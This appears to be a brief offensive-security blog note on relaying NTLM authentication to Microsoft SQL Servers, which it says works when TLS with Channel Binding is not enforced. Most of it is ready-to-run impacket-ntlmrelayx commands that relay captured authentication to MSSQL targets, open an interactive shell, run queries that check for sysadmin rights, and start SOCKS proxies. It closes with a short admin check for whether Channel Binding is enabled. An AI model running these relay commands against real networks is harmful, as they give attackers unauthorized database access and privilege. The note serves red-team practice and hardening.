NTLM Relay to MSSQL

05.06.2024 ยท dadevel

MSSQL servers can be used as NTLM Relay Sink. Relaying can be prevented by requiring TLS encryption with Channel Binding, but this is not enforced by default (source).

Relay to a single MSSQL server and drop into an interactive shell (source).

impacket-ntlmrelayx --no-http-server --no-raw-server --no-wcf-server -smb2support -i --no-multirelay -t mssql://db01.corp.local

Relay to multiple MSSQL servers and execute a predefined SQL query.

impacket-ntlmrelayx --no-http-server --no-raw-server --no-wcf-server -smb2support -tf ./mssql.txt -q "SELECT SYSTEM_USER;SELECT USER_NAME();SELECT IS_SRVROLEMEMBER('sysadmin');"

Relay to multiple MSSQL servers and start a SOCKS proxy per target.

impacket-ntlmrelayx --no-http-server --no-raw-server --no-wcf-server -smb2support -tf ./mssql.txt -socks

It might be necessary to specify the target as IP address.

Check as admin if Channel Binding is enabled.

name=$(echo 'SELECT Name FROM __NAMESPACE' | impacket-wmiquery -namespace '//./root/Microsoft/SqlServer' -file /dev/stdin corp.local/jdoe:'passw0rd'@db01.corp.local | awk '/ComputerManagement[0-9]+/{print $2}')
echo 'SELECT ExtendedProtection FROM ServerSettingsExtendedProtection' | impacket-wmiquery -namespace "//./root/Microsoft/SqlServer/$name" -file /dev/stdin corp.local/jdoe:'passw0rd'@db01.corp.local

References: